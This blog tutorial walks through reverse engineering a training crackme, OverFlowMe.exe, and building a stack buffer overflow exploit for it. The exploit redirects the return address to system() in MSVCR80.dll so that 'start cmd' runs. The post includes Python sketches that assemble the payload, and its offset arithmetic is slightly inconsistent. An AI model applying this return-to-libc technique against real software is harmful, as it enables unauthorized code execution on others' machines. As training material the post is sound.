
June 26, 2013

Stack Buffer Overflow Reverse engineering: OverFlowMe.exe

Hello again and welcome to my blog. I've recently come across a very nice riddle aimed at BoF and RE fans at the same time. It takes the trainee another step out of the box, testing his or her ability to reverse engineer a program and exploit a Buffer Overflow in it. Stay tuned :P
Let’s take a look at the simple executable:

What this innocent file does is ask a question and wait for the user to reply with his name.
The name entered is saved on the stack as a local variable and echoed back to the command line as text.

**This is the right time to say that if you don’t know what RE or BoF is, it is best to research the two a bit and come back when you’re better prepared.
Long story short, RE is of course Reverse Engineering: the art of analyzing a compiled program, without its source code, to understand how it works. With that understanding a programmer can extend its functionality, and a malicious user can craft malicious input for it. Extending functionality can of course also mean exploiting the program to do things it’s not supposed to do.

BoF is short for a vulnerability called Buffer Overflow. This "bug" is characterized by feeding a program input longer than the buffer allocated for it, forcing it to “step out” of that buffer and overwrite adjacent variables and saved areas in memory in a way that causes a failure or gets malicious code to execute.
There are multiple ways to exploit this vulnerability. We’ll be focusing on Stack BoF.
Here’s the deal:

From left to right: let’s say I wrote code that creates a char c[12] array and initializes it to “hello”. The stack will look something like the second image.
Notice the green and red areas: those are the saved areas for the Frame Pointer and the Return Address. Those two are very important, making sure we know where we are on the stack and where to return to.
In my code I've also created a function that rewrites this variable, but I didn't add any restriction on how much can be written to it. This mistake was expensive: a loop in main() writing 200 ‘A’s overwrote my stack variable (see image 3) and ran past the end of the buffer, also overwriting the Frame Pointer and the Return Address. When my function reaches its return; statement it will use the Return Address from the stack, which now holds 0x41414141 (AAAA). This address is of course not mapped, so jumping to it causes an Access Violation. Windows terminates the application because no Exception Handler deals with the fault.
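To make the picture concrete, here is a minimal Python sketch that models the frame as raw bytes. The layout (a 12-byte buffer directly followed by a 4-byte saved Frame Pointer and a 4-byte Return Address), the initial values and the helper name unchecked_copy are assumptions for illustration only; a real stack holds other data too and the compiler may add padding.

```python
import struct

BUF_SIZE = 12             # char c[12]
FP_OFFSET = BUF_SIZE      # saved Frame Pointer right after the buffer (assumed)
RA_OFFSET = BUF_SIZE + 4  # Return Address right after the Frame Pointer (assumed)

# Model a slice of memory: the frame, followed by whatever lies above it.
memory = bytearray(256)
memory[0:6] = b"hello\x00"
struct.pack_into("<I", memory, FP_OFFSET, 0x0018FF80)  # made-up saved Frame Pointer
struct.pack_into("<I", memory, RA_OFFSET, 0x00401234)  # made-up Return Address


def unchecked_copy(mem, data):
    """Copy data to the start of the buffer without any length check."""
    mem[0:len(data)] = data


unchecked_copy(memory, b"A" * 200)

saved_fp = struct.unpack_from("<I", memory, FP_OFFSET)[0]
return_address = struct.unpack_from("<I", memory, RA_OFFSET)[0]
print(hex(saved_fp), hex(return_address))  # 0x41414141 0x41414141
```

Both saved values now read 0x41414141, which is exactly the address the function would try to return to.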

Now let’s take a minute to think about what would have happened if a malicious user could exploit this vulnerability and create a BoF in that program. Well yeah, the program then crashes and the hacker is happy, but what else?
You’re right, if an attacker can overwrite the Return Address with some REAL address in the Address Space, she can make the program execute malicious code, for example from the stack. This is exactly what we are about to do!

First things first, we need to use a disassembler to virtually build the stack and see exactly what we need in order to exploit this executable.

**I’m using IDA Pro (free version) and OllyDBG (IDA does static analysis while Olly can analyze at run-time)

Here is our executable in the static code analysis tool. In the “View-A” window we can see our binary laid out instruction by instruction, even though that says nothing yet about how things will be organized on the stack.
On the left of that window we can see each line's location in the form .text:[address].
Starting from the first line: EBP, our Base Pointer, is saved, and mov then sets it to the current Stack Pointer (the top of the stack, since our frame is still empty). Then 40h (Hex) is subtracted from the Stack Pointer to allocate room for local variables, and ESI (the Source Index register) is pushed so that its value can be restored before the function returns.
Then comes the printf() call and its setup (mov, push, call). Next, the address of the local buffer at var_40+ebp is loaded into register ‘A’ (eax) and pushed onto the stack as the argument to gets(), which reads the user’s input into that buffer. After that, the program pushes the buffer again together with the offset of “Hello” and calls printf(), which prints the user’s input along with the rest of the sentence.
Now we know our stack looks as follows:

40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address
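The layout above translates into offsets measured from the start of the input buffer. A small sketch, assuming the 40h bytes of locals are exactly the input buffer and that nothing else sits between it and the saved Frame Pointer (the constant names are mine):

```python
LOCALS_SIZE = 0x40    # the 40h subtracted from the Stack Pointer
SAVED_FP_SIZE = 4     # saved Frame Pointer, 4 bytes
RETURN_ADDR_SIZE = 4  # Return Address, 4 bytes

fp_offset = LOCALS_SIZE                   # first byte of the saved Frame Pointer
ra_offset = fp_offset + SAVED_FP_SIZE     # first byte of the Return Address
frame_end = ra_offset + RETURN_ADDR_SIZE  # first byte past the Return Address

print(fp_offset, ra_offset, frame_end)    # 64 68 72
```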

What I would like to do is overwrite the whole stack frame. The problem is that if I do that carelessly, the stack will no longer hold a valid Return Address and I won’t be able to execute my malicious code. To solve this I’ll need to supply a new, custom Frame Pointer and Return Address so the program keeps running without errors and the stack keeps a correct structure.
Here is what I’m about to do:
40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address
My Frame Pointer
My Return Address

Now that I know what I want to do, I need to calculate exactly how much garbage to inject into the program so that the new Return Address is written in the right place. Once I get there, the second step will be to put an address into my Return Address that takes me straight to my malicious code.

Oops… wait a second. Take a look at the program again:

Scrolling down the Strings window we can see the name of a DLL called MSVCR80.dll, which may indicate that the program is using this DLL. Looking at DependencyWalker (next screenshot) we can confirm our suspicion (next to the red '1').

Let’s check Google for this file’s capabilities. Maybe we can spare ourselves loading a malicious DLL and carry out the attack by calling some function from a legitimate DLL the program already uses.

A quick look on Google told me that “msvcr80.dll is a module associated with Microsoft Visual Studio 2005 from Microsoft Corporation. It is the Microsoft C Runtime Library and is used by programs written with Microsoft Visual Studio 2005.”

The conclusion is that this DLL may well provide system() or _execv(). Using DependencyWalker we will try to find the base address this DLL loads at and the relative offset of these functions. Here is what I found:

The DLL loads at 0x78130000 and the offset of the system() function is 0x0003009B, which means we need to add one to the other using a Hex calculator:
Go to calc.exe (Start → Run → calc) and switch to the Programmer view (Alt+3). Switch from Decimal to Hex in the upper left corner of the calculator and simply add the two values:
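If you prefer a script over calc.exe, the same addition can be sketched in a few lines of Python. The two values are the ones quoted above; the constant names are mine.

```python
DLL_BASE = 0x78130000       # base address reported by DependencyWalker
SYSTEM_OFFSET = 0x0003009B  # offset of system() inside the DLL

system_address = DLL_BASE + SYSTEM_OFFSET
print(f"{system_address:08X}")  # 7816009B
```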

Now we know that in order to call system() we need to overflow the stack, build some arbitrary 4-byte Frame Pointer (we won’t even be using it, so we don’t care about its content) and follow it with the address of the loaded function, exactly as we just calculated.
But wait, aren’t we missing something? Let’s see again:
      1)      Overflow the program – check!
      2)      Create a new Frame Pointer and Return Address to keep stack logic structure – check!
      3)      Pour into the Return Address our call for the system() function from its original address – check!
Ohh… we’re missing system()’s argument!

Now we need to find a way to create a pointer to the place where we put our argument. The argument for this example will be “start cmd”, which will open a new Command Line window, waiting for you to maliciously take over the machine.
Keep a close eye because this is a tricky one. Here’s how the stack should look:

     Stack abstract                  Stack input
40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address
My Frame Pointer
My Return Address                    78 16 00 9B
Pointer to command address           Some pointer
malicious command                    “start cmd”

**Notice that when we’re injecting addresses we’re using “Little Endian”, which basically means we need to write the bytes of the address in reverse order while keeping each byte's Hex value. Example: 00 B7 78 16 → 16 78 B7 00
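The byte reversal can be checked with Python's struct module, where the "<I" format packs a 32-bit unsigned value in little-endian order. The helper names to_little_endian and spaced_hex are mine, added only for this sketch.

```python
import struct


def to_little_endian(address):
    """Return the 4 bytes of a 32-bit address in little-endian order."""
    return struct.pack("<I", address)


def spaced_hex(data):
    """Format bytes the way a hex editor shows them, e.g. '16 78 B7 00'."""
    return " ".join(f"{b:02X}" for b in data)


print(spaced_hex(to_little_endian(0x00B77816)))  # 16 78 B7 00
print(spaced_hex(to_little_endian(0x7816009B)))  # 9B 00 16 78
```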

To get the pointer we cannot use IDA Pro because IDA, as we said earlier, does static binary analysis. If we want to analyze the code dynamically we need a tool that can make this magic happen.
OllyDBG is exactly what we need (you can also use Immunity Debugger or the like).
Why do we need to analyze the program at run-time?
The thing is that we want to know the address of our injected data, which will only exist after we run the program and input our string.

Here is the next procedure:

Now we would like to execute the file, input the string that causes the overflow and calculate exactly where the pointer passed to system() should point.
Starting the program we can see the disassembly, and by holding the Step Over key (F8) until it stops by itself, we get to the following address: 00 18 FF 4C

This address is of course the location where the user is supposed to insert his input. If we look at the Command Line prompt we should see:

Now we have everything we need except a comfortable editor to write our exploit in.
I recommend a nice editor called HxD, but you can also use Hex Editor Neo and others.
Our exploit should look as follows:

40Hex (stack variables) + 10Hex (4 Dec Frame Pointer + 4 Dec Return Add + 4 Dec New FP) + MSVCR80.DLL address (system() location) + 4Hex pointer + system command (start cmd)
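The same file can be assembled with a script instead of typing it by hand. This is only a sketch of the formula above: the function name build_payload, the 'A' filler byte and the parameter names are my own, and the two addresses are the values found so far (the system() address from DependencyWalker and the input address seen in Olly), passed in as parameters so they can be swapped out. How the input line is terminated is not covered here, so nothing is appended after the command.

```python
import struct


def build_payload(filler_len, system_addr, arg_pointer, command, filler=b"A"):
    """Lay out: filler bytes, system() address, 4-byte pointer, command text."""
    payload = filler * filler_len
    payload += struct.pack("<I", system_addr)  # little-endian address of system()
    payload += struct.pack("<I", arg_pointer)  # little-endian pointer value
    payload += command                         # the command text itself
    return payload


payload = build_payload(
    filler_len=0x40 + 0x10,   # 40Hex + 10Hex, as in the formula
    system_addr=0x7816009B,   # base + offset, as calculated earlier
    arg_pointer=0x0018FF4C,   # address observed in the debugger (assumed to be the pointer)
    command=b"start cmd",
)
print(len(payload))  # 97
```

Writing the bytes out with open("exploit.dat", "wb") would give the same kind of file as the hex editor does.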

This is how it looks in HxD:

**Notice that addresses are supposed to be written in the Hex (left) pane while ASCII text is written in the text (right) pane.

Let’s save this file as exploit.dat and do the following:
      1)      Open Command Line
      2)      Go to overFlowMe.exe location
      3)      Run the following command: overFlowMe.exe < c:\filepath\exploit.dat
a.       This command executes the .exe file, and when the program asks for user input the content of the exploit file is fed to gets() in place of keyboard input, exploiting the program.
 But wait… we got an error:

Why is that?! We did everything as it is supposed to be…
Do you have any idea?
Well, I ran into this error and after a quick brainstorm with myself I understood that it has to be one of three options:
      1)      Something is wrong in the overflow
a.       Countermeasure – calculated everything again. It came out exactly the same.
      2)      Something is wrong with the return address – could be.
      3)      Something is wrong with the pointer – couldn't be. If it were a pointer issue the error would have been different. Trust me on that for now.

Having eliminated (1) and (3), I started checking whether the address is wrong. A quick consultation with a friend led me to a very interesting solution. My friend told me that DependencyWalker only displays the preferred base address and that I had better double check the actual one in OllyDBG, and so I did.

Here is what I did:
      1)      Open Olly and click on the ‘M’ (Memory) button.
      2)      A window will open, with an organized table containing everything you need to know about the memory map of the process.
      3)      Look for your DLL under the “owner” column and check what address it is loaded at.
      4)      In the following image we can see that the MSVCR80.DLL PE header is loaded at 74 B0 00 00

Now let’s correct our exploit:
74 B0 00 00 + 00 03 00 9B = 74 B3 00 9B
** 00 03 00 9B is the offset to system(), remember?
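Since only the base changed, the correction amounts to moving the old address from the preferred base to the actual one. A short sketch of that rebasing, with a hypothetical helper named rebase:

```python
PREFERRED_BASE = 0x78130000  # what DependencyWalker showed
ACTUAL_BASE = 0x74B00000     # what the memory map in OllyDBG showed
SYSTEM_OFFSET = 0x0003009B   # offset of system() inside the DLL


def rebase(address, old_base, new_base):
    """Keep the offset inside the module, swap the base it is added to."""
    return address - old_base + new_base


old_system = PREFERRED_BASE + SYSTEM_OFFSET
new_system = rebase(old_system, PREFERRED_BASE, ACTUAL_BASE)
print(f"{old_system:08X} -> {new_system:08X}")  # 7816009B -> 74B3009B
```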

Let’s rerun overFlowMe.exe < c:\filepath\exploit.dat

Again an error!
Well, now the error is very clear. The pointer is wrong, and system() gets a command it does not understand. It is the equivalent of typing: c:\>wrong windows command
Error: “‘wrong’ is not recognized as an internal or external command…”

What is missing?
If we look at the error we see that system() did try to execute text from our exploit, only it started reading too early in our data.
Going back to Olly and double clicking the address column in the bottom right pane, we see that we are off by 8. Double clicking again to go back to the regular addresses, the line marked by ‘==>’ will probably show us the right address, the one where the right part of our input starts.

The address near ‘==>’ is 00 18 FF 54
**don’t forget “Little Endian”
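As a sanity check, the new pointer is the earlier input address moved forward by the 8 bytes we were off, and it goes into the file in little-endian order. A tiny sketch (the variable names are mine):

```python
import struct

OLD_POINTER = 0x0018FF4C  # address found earlier in the debugger
DELTA = 8                 # how far off the pointer was

new_pointer = OLD_POINTER + DELTA
pointer_bytes = struct.pack("<I", new_pointer)
as_typed = " ".join(f"{b:02X}" for b in pointer_bytes)

print(f"{new_pointer:08X}")  # 0018FF54
print(as_typed)              # 54 FF 18 00
```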
Let’s rewrite the exploit again and see if that fixes our error.

Executing the .exe again with our exploit gives us the following:

Voilà! We got it. Our exploit worked!
We managed to create a Buffer Overflow, rebuild the stack and execute system(“start cmd”);

Hope you've enjoyed (:

